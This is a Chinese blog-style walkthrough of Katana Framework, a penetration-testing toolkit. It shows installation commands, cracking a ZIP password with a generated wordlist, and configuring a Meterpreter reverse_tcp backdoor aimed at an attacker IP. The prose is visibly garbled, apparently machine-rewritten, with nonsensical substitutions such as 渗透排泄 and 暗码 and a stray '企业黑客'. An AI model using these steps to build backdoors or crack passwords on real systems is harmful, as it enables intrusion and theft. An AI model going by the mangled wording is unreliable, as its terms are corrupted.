快捷搜索:  网络  渗透  后门  CVE  扫描  木马  黑客  as

Katana Framework军人刀操作指南

Katana Framework是用Python说话写的渗透排泄框架,但我更以为它像是一个工具箱,作者是俄罗斯人,该工具集成下列功能:SQL注入、NMAP体系扫描探测、DNS诈骗,DNS伪装、MSF后门、字典生成、邮件炸弹、WHOIS、ARP投毒、对HTTP、SSH、RAR 、ZIP的暴力破解还有部分模块可以对ARP、无线接入点、LAN以及WEB进行拒尽服务攻击。

PS:本文仅限于手艺分享与讨论,严禁用于非法用途。

目前katana可以运行在下列的操作体系及分支。

体系分支 版本 支持 已经装置的依靠项目 状态
Kali Linux 4.4.0 可工作
Debian(8) 4.4.0 可工作
Parrot OS 可工作
Wifislax 可工作
OpenSuse 可工作
Arch Linux 4.8.6 可工作
Raspbian 4.1.7 可工作
Ubuntu 14.04 可工作
Xbuntu 4.4.0 可工作

装置以及使用

起首我们使用git命令把它克隆到我们内陆,这里我是用的是Centos7 x64

git clone https://github.com/PowerScript/KatanaFramework.git

要正常使用该工具我们还需要装置,守候脚本实现装置后,我们在命令行输入ktf.console就可以让它跑起来了。

cd KatanaFramework 
chmod +x install
python install

Screenshot from 2018-04-23 09-20-01.png

实在这个工具跟meta很多特性都很相似,譬如每一次启动都会有不同的字符画,还有就是配置模块的症结字也是相同的

Screenshot from 2018-04-23 09-28-34.png

输入help可以查看该框架的帮助信息,show modules可以显示所有可用模块

show modules

Screenshot from 2018-04-23 09-36-54.png

譬如我们生成一个字典并用来暴力破解Zip压缩文件(当然我们只是做个测试,要是暗码复杂的话破解照样得靠运气运限的)使用use症结字加载一个模块

use mcs/gn.words
show options

Screenshot from 2018-04-23 10-22-47.png

我们保持参数默认,Run以后在我的home目录生成了一个7m左右的纯数字字典,以后我们载入fle/bt.zip模块

Screenshot from 2018-04-23 10-48-07.png

Screenshot from 2018-04-23 10-48-57.png

现在可以看到已经跑出了暗码文件,然则在实际的破解中需要有一个无比强盛的字典 。

我们再使用msf后门模块,生成一个后门试试

2018-04-23 20-09-15屏幕截图.png

这里我把体系换成了kali,因为这个模块需要调用msfvenom命令,企业黑客,而Centos上装置的msfvenom生成后门始终失足,所以只能用咱们都懂的体系了,我们看到payload选项以及encoders有大批的参数可供调用,人人可以根据本人需求填写,

使用set症结字配置参数,这里我把ip配置成攻击机,

set host 192.168.1.132
set encoder avoid_underscore_tolower
再配置一下编码
set payload windows/meterpreter/reverse_tcp
配置成反向的shell

然后run生成后门文件,只无非msf的木马各大厂商都能识别了,没有好的免杀结果我就不在这里献丑了

2018-04-23 20-39-33屏幕截图.png

由于它渗透排泄能力比较弱,我照样以为这更像个做测试工具包,我在这里就不11演示每一个模块了,人人可以本人去探索。

您可能还会对下面的文章感兴趣: